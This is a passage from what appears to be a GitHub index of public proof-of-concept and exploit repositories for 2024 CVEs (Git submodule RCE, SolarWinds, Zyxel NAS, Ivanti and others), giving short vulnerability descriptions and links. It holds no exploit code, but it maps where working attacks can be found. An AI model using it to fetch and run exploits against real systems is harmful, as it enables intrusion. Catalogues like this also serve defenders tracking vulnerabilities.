DLL loading from a world-writable directory during service initialization. + + +- [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589) + +### CVE-2024-28715 (2024-03-19) + +Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint. + + +- [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715) + +### CVE-2024-28741 (2024-04-06) + +Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component. + + +- [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc) + +### CVE-2024-28757 (2024-03-10) + +libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate). + + +- [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757) +- [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757) +- [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757) + +### CVE-2024-28987 (2024-08-21) + +The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data. + + +- [gh-ost00/CVE-2024-28987-POC](https://github.com/gh-ost00/CVE-2024-28987-POC) +- [horizon3ai/CVE-2024-28987](https://github.com/horizon3ai/CVE-2024-28987) +- [PlayerFridei/CVE-2024-28987](https://github.com/PlayerFridei/CVE-2024-28987) +- [expl0itsecurity/CVE-2024-28987](https://github.com/expl0itsecurity/CVE-2024-28987) + +### CVE-2024-28995 (2024-06-06) + +\n\n\n\n\n\n\n\n\n\n\n\nSolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. \n\n\n\n\n\n\n\n + + +- [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995) +- [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995) +- [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template) +- [0xc4t/CVE-2024-28995](https://github.com/0xc4t/CVE-2024-28995) +- [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995) +- [muhammetali20/CVE-2024-28995](https://github.com/muhammetali20/CVE-2024-28995) +- [Praison001/CVE-2024-28995-SolarWinds-Serv-U](https://github.com/Praison001/CVE-2024-28995-SolarWinds-Serv-U) +- [Stuub/CVE-2024-28995](https://github.com/Stuub/CVE-2024-28995) +- [gotr00t0day/CVE-2024-28995](https://github.com/gotr00t0day/CVE-2024-28995) + +### CVE-2024-28999 (2024-06-04) + +The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console. + + +- [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999) + +### CVE-2024-29050 (2024-04-09) + +Windows Cryptographic Services Remote Code Execution Vulnerability + + +- [Akrachli/CVE-2024-29050](https://github.com/Akrachli/CVE-2024-29050) + +### CVE-2024-29059 (2024-03-22) + +.NET Framework Information Disclosure Vulnerability + + +- [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak) + +### CVE-2024-29269 (2024-04-10) + +An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter. + + +- [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269) +- [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269) +- [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269) +- [dream434/CVE-2024-29269](https://github.com/dream434/CVE-2024-29269) +- [K3ysTr0K3R/CVE-2024-29269-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-29269-EXPLOIT) +- [hack-with-rohit/CVE-2024-29269-RCE](https://github.com/hack-with-rohit/CVE-2024-29269-RCE) +- [Quantum-Hacker/CVE-2024-29269](https://github.com/Quantum-Hacker/CVE-2024-29269) + +### CVE-2024-29272 (2024-03-22) + +Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php. + + +- [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272) + +### CVE-2024-29275 (2024-03-22) + +SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php. + + +- [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template) + +### CVE-2024-29278 (2024-03-30) + +funboot v1.1 is vulnerable to Cross Site Scripting (XSS) via the title field in "create a message ." + + +- [QDming/cve](https://github.com/QDming/cve) + +### CVE-2024-29296 (2024-04-10) + +A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. + + +- [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296) +- [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC) + +### CVE-2024-29375 (2024-04-04) + +CSV Injection vulnerability in Addactis IBNRS v.3.10.3.107 allows a remote attacker to execute arbitrary code via a crafted .ibnrs file to the Project Description, Identifiers, Custom Triangle Name (inside Input Triangles) and Yield Curve Name parameters. + + +- [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375) + +### CVE-2024-29399 (2024-04-11) + +An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component. + + +- [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399) + +### CVE-2024-29404 (2024-12-03) + +An issue in Razer Synapse 3 v.3.9.131.20813 and Synapse 3 App v.20240213 allows a local attacker to execute arbitrary code via the export parameter of the Chroma Effects function in the Profiles component. + + +- [mansk1es/CVE-2024-29404_Razer](https://github.com/mansk1es/CVE-2024-29404_Razer) + +### CVE-2024-29415 (-) + +The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282. + + +- [felipecruz91/node-ip-vex](https://github.com/felipecruz91/node-ip-vex) + +### CVE-2024-29510 (2024-07-03) + +Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device. + + +- [swsmith2391/CVE-2024-29510](https://github.com/swsmith2391/CVE-2024-29510) + +### CVE-2024-29671 (2024-12-16) + +Buffer Overflow vulnerability in NEXTU FLATA AX1500 Router v.1.0.2 allows a remote attacker to execute arbitrary code via the POST request handler component. + + +- [laskdjlaskdj12/CVE-2024-29671-POC](https://github.com/laskdjlaskdj12/CVE-2024-29671-POC) + +### CVE-2024-29824 (2024-05-31) + +An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. + + +- [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824) +- [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824) + +### CVE-2024-29847 (2024-09-12) + +Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution. + + +- [sinsinology/CVE-2024-29847](https://github.com/sinsinology/CVE-2024-29847) + +### CVE-2024-29849 (2024-05-22) + +Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface. + + +- [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849) + +### CVE-2024-29855 (2024-06-11) + +Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator + + +- [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855) + +### CVE-2024-29863 (2024-04-05) + +A race condition in the installer executable in Qlik Qlikview before versions May 2022 SR3 (12.70.20300) and May 2023 SR2 (12,80.20200) may allow an existing lower privileged user to cause code to be executed in the context of a Windows Administrator. + + +- [pawlokk/qlikview-poc-CVE-2024-29863](https://github.com/pawlokk/qlikview-poc-CVE-2024-29863) + +### CVE-2024-29868 (2024-06-24) + +Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.\nThis allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.\nThis issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n + + +- [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868) + +### CVE-2024-29895 (2024-05-13) + +Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc. + + +- [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC) +- [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895) +- [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py) +- [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895) + +### CVE-2024-29943 (2024-03-22) + +An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1. + + +- [bjrjk/CVE-2024-29943](https://github.com/bjrjk/CVE-2024-29943) + +### CVE-2024-29972 (2024-06-04) + +** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + + +- [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972) +- [Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc](https://github.com/Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc) + +### CVE-2024-29973 (2024-06-04) + +** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + + +- [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973) +- [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973) +- [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973) +- [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973) +- [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973) +- [skyrowalker/CVE-2024-29973](https://github.com/skyrowalker/CVE-2024-29973) + +### CVE-2024-29988 (2024-04-09) + +SmartScreen Prompt Security Feature Bypass Vulnerability + + +- [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit) + +### CVE-2024-30043 (2024-05-14) + +Microsoft SharePoint Server Information Disclosure Vulnerability + + +- [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE) + +### CVE-2024-30051 (2024-05-14) + +Windows DWM Core Library Elevation of Privilege Vulnerability + + +- [fortra/CVE-2024-30051](https://github.com/fortra/CVE-2024-30051) + +### CVE-2024-30052 (2024-06-11) + +Visual Studio Remote Code Execution Vulnerability + + +- [ynwarcs/CVE-2024-30052](https://github.com/ynwarcs/CVE-2024-30052) + +### CVE-2024-30056 (2024-05-25) + +Microsoft Edge (Chromium-based) Information Disclosure Vulnerability + + +- [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure) + +### CVE-2024-30085 (2024-06-11) + +Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability + + +- [Adamkadaban/CVE-2024-30085](https://github.com/Adamkadaban/CVE-2024-30085) +- [murdok1982/Exploit-PoC-para-CVE-2024-30085](https://github.com/murdok1982/Exploit-PoC-para-CVE-2024-30085) + +### CVE-2024-30088 (2024-06-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088) +- [NextGenPentesters/CVE-2024-30088-](https://github.com/NextGenPentesters/CVE-2024-30088-) +- [Zombie-Kaiser/CVE-2024-30088-Windows-poc](https://github.com/Zombie-Kaiser/CVE-2024-30088-Windows-poc) +- [exploits-forsale/collateral-damage](https://github.com/exploits-forsale/collateral-damage) +- [Admin9961/CVE-2024-30088](https://github.com/Admin9961/CVE-2024-30088) +- [Justintroup85/exploits-forsale-collateral-damage](https://github.com/Justintroup85/exploits-forsale-collateral-damage) + +### CVE-2024-30090 (2024-06-11) + +Microsoft Streaming Service Elevation of Privilege Vulnerability + + +- [Dor00tkit/CVE-2024-30090](https://github.com/Dor00tkit/CVE-2024-30090) + +### CVE-2024-30212 (2024-05-28) + +If a SCSI READ(10) command is initiated via USB using the largest LBA \n(0xFFFFFFFF) with it's default block size of 512 and a count of 1,\n\nthe first 512 byte of the 0x80000000 memory area is returned to the \nuser. If the block count is increased, the full RAM can be exposed.\n\nThe same method works to write to this memory area. If RAM contains \npointers, those can be - depending on the application - overwritten to\n\nreturn data from any other offset including Progam and Boot Flash. + + +- [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak) + +### CVE-2024-30255 (2024-04-04) + +Envoy is a cloud-native, open source edge and service proxy. The HTTP/2 protocol stack in Envoy versions prior to 1.29.3, 1.28.2, 1.27.4, and 1.26.8 are vulnerable to CPU exhaustion due to flood of CONTINUATION frames. Envoy's HTTP/2 codec allows the client to send an unlimited number of CONTINUATION frames even after exceeding Envoy's header map limits. This allows an attacker to send a sequence of CONTINUATION frames without the END_HEADERS bit set causing CPU utilization, consuming approximately 1 core per 300Mbit/s of traffic and culminating in denial of service through CPU exhaustion. Users should upgrade to version 1.29.3, 1.28.2, 1.27.4, or 1.26.8 to mitigate the effects of the CONTINUATION flood. As a workaround, disable HTTP/2 protocol for downstream connections. + + +- [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC) + +### CVE-2024-30270 (2024-04-04) + +mailcow: dockerized is an open source groupware/email suite based on docker. A security vulnerability has been identified in mailcow affecting versions prior to 2024-04. This vulnerability is a combination of path traversal and arbitrary code execution, specifically targeting the `rspamd_maps()` function. It allows authenticated admin users to overwrite any file writable by the www-data user by exploiting improper path validation. The exploit chain can lead to the execution of arbitrary commands on the server. Version 2024-04 contains a patch for the issue. + + +- [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC) + +### CVE-2024-30491 (2024-03-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.8.\n\n + + +- [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc) + +### CVE-2024-30614 (2024-04-12) + +An issue in Ametys CMS v4.5.0 and before allows attackers to obtain sensitive information via exposed resources to the error scope. + + +- [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614) + +### CVE-2024-30656 (2024-04-15) + +An issue in Fireboltt Dream Wristphone BSW202_FB_AAC_v2.0_20240110-20240110-1956 allows attackers to cause a Denial of Service (DoS) via a crafted deauth frame. + + +- [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability) + +### CVE-2024-30850 (2024-04-12) + +An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go + + +- [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc) + +### CVE-2024-30851 (2024-05-03) + +Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component. + + +- [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc) + +### CVE-2024-30875 (2024-10-17) + +Cross Site Scripting vulnerability in JavaScript Library jquery-ui v.1.13.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted payload to the window.addEventListener component. NOTE: this is disputed by the Supplier because it cannot be reproduced, and because the exploitation example does not indicate whether, or how, the example website is using jQuery UI. + + +- [Ant1sec-ops/CVE-2024-30875](https://github.com/Ant1sec-ops/CVE-2024-30875) + +### CVE-2024-30896 (2024-11-21) + +InfluxDB OSS 2.x through 2.7.11 stores the administrative operator token under the default organization which allows authorized users with read access to the authorization resource of the default organization to retrieve the operator token. InfluxDB OSS 1.x, Enterprise, Cloud, Cloud Dedicated and Clustered are not affected. NOTE: The researcher states that InfluxDB allows allAccess administrators to retrieve all raw tokens via an "influx auth ls" command. The supplier indicates that the organizations feature is operating as intended and that users may choose to add users to non-default organizations. A future release of InfluxDB 2.x will remove the ability to retrieve tokens from the API. + + +- [XenoM0rph97/CVE-2024-30896](https://github.com/XenoM0rph97/CVE-2024-30896) + +### CVE-2024-30956 +- [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956) + +### CVE-2024-30973 (2024-05-06) + +An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbtirary code and obtain sensitive information via crafted POST request to /boaform/getASPdata/formFirewall, /boaform/getASPdata/formAcc. + + +- [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973) + +### CVE-2024-30998 (2024-04-03) + +SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component. + + +- [efekaanakkar/CVE-2024-30998](https://github.com/efekaanakkar/CVE-2024-30998) + +### CVE-2024-31211 (2024-04-04) + +WordPress is an open publishing platform for the Web. Unserialization of instances of the `WP_HTML_Token` class allows for code execution via its `__destruct()` magic method. This issue was fixed in WordPress 6.4.2 on December 6th, 2023. Versions prior to 6.4.0 are not affected. + + +- [Abdurahmon3236/-CVE-2024-31211](https://github.com/Abdurahmon3236/-CVE-2024-31211) + +### CVE-2024-31317 (2024-07-09) + +In multiple functions of ZygoteProcess.java, there is a possible way to achieve code execution as any app via WRITE_SECURE_SETTINGS due to unsafe deserialization. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. + + +- [fuhei/CVE-2024-31317](https://github.com/fuhei/CVE-2024-31317) + +### CVE-2024-31319 (2024-07-09) + +In updateNotificationChannelFromPrivilegedListener of NotificationManagerService.java, there is a possible cross-user data leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [MssGmz99/fix-02-failure-CVE-2024-31319-CVE-2024-0039](https://github.com/MssGmz99/fix-02-failure-CVE-2024-31319-CVE-2024-0039) + +### CVE-2024-31351 (2024-05-17) + +Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6. + + +- [KTN1990/CVE-2024-31351_wordpress_exploit](https://github.com/KTN1990/CVE-2024-31351_wordpress_exploit) + +### CVE-2024-31497 (2024-04-15) + +In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6. + + +- [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497) +- [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497) +- [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC) + +### CVE-2024-31666 (2024-04-22) + +An issue in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via a crafted script to the edit_addon_post.php component. + + +- [hapa3/CVE-2024-31666](https://github.com/hapa3/CVE-2024-31666) + +### CVE-2024-31719 +- [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability) + +### CVE-2024-31771 (-) + +Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file + + +- [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771) + +### CVE-2024-31777 (2024-06-13) + +File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint. + + +- [FreySolarEye/Exploit-CVE-2024-31777](https://github.com/FreySolarEye/Exploit-CVE-2024-31777) + +### CVE-2024-31819 (2024-04-10) + +An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component. + + +- [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819) +- [dream434/CVE-2024-31819](https://github.com/dream434/CVE-2024-31819) + +### CVE-2024-31835 (2024-10-01) + +Cross Site Scripting vulnerability in flatpress CMS Flatpress v1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the file name parameter. + + +- [paragbagul111/CVE-2024-31835](https://github.com/paragbagul111/CVE-2024-31835) + +### CVE-2024-31848 (2024-04-05) + +A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. + + +- [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC) + +### CVE-2024-31974 (-) + +The com.solarized.firedown (aka Solarized FireDown Browser & Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions). + + +- [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown) + +### CVE-2024-31982 (2024-04-10) + +XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki. + + +- [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982) +- [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982) +- [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982) + +### CVE-2024-31989 (2024-05-21) + +Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It has been discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. Despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance. This issue has been patched in version(s) 2.8.19, 2.9.15 and 2.10.10. + + +- [vt0x78/CVE-2024-31989](https://github.com/vt0x78/CVE-2024-31989) + +### CVE-2024-32002 (2024-05-14) + +Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources. + + +- [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002) +- [markuta/hooky](https://github.com/markuta/hooky) +- [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce) +- [amalmurali47/hook](https://github.com/amalmurali47/hook) +- [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002) +- [JakobTheDev/cve-2024-32002-submodule-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce) +- [JakobTheDev/cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-poc-rce) +- [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002) +- [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC) +- [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk) +- [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod) +- [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash) +- [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk) +- [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod) +- [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash) +- [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002) +- [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule) +- [10cks/hook](https://github.com/10cks/hook) +- [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK) +- [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP) +- [CrackerCat/CVE-2024-32002_EXP](https://github.com/CrackerCat/CVE-2024-32002_EXP) +- [Roronoawjd/hook](https://github.com/Roronoawjd/hook) +- [Roronoawjd/git_rce](https://github.com/Roronoawjd/git_rce) +- [JJoosh/CVE-2024-32002-Reverse-Shell](https://github.com/JJoosh/CVE-2024-32002-Reverse-Shell) +- [1mxml/CVE-2024-32002-poc](https://github.com/1mxml/CVE-2024-32002-poc) +- [bfengj/CVE-2024-32002-hook](https://github.com/bfengj/CVE-2024-32002-hook) +- [ycdxsb/CVE-2024-32002-hulk](https://github.com/ycdxsb/CVE-2024-32002-hulk) +- [ycdxsb/CVE-2024-32002-submod](https://github.com/ycdxsb/CVE-2024-32002-submod) +- [bfengj/CVE-2024-32002-Exploit](https://github.com/bfengj/CVE-2024-32002-Exploit) +- [vincepsh/CVE-2024-32002](https://github.com/vincepsh/CVE-2024-32002) +- [vincepsh/CVE-2024-32002-hook](https://github.com/vincepsh/CVE-2024-32002-hook) +- [JJoosh/CVE-2024-32002](https://github.com/JJoosh/CVE-2024-32002) +- [10cks/CVE-2024-32002-EXP](https://github.com/10cks/CVE-2024-32002-EXP) +- [WOOOOONG/CVE-2024-32002](https://github.com/WOOOOONG/CVE-2024-32002) +- [WOOOOONG/hook](https://github.com/WOOOOONG/hook) +- [fadhilthomas/poc-cve-2024-32002](https://github.com/fadhilthomas/poc-cve-2024-32002) +- [fadhilthomas/hook](https://github.com/fadhilthomas/hook) +- [JakobTheDev/cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw) +- [JakobTheDev/cve-2024-32002-poc-aw](https://github.com/JakobTheDev/cve-2024-32002-poc-aw) +- [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce) +- [431m/rcetest](https://github.com/431m/rcetest) +- [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002) +- [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku) +- 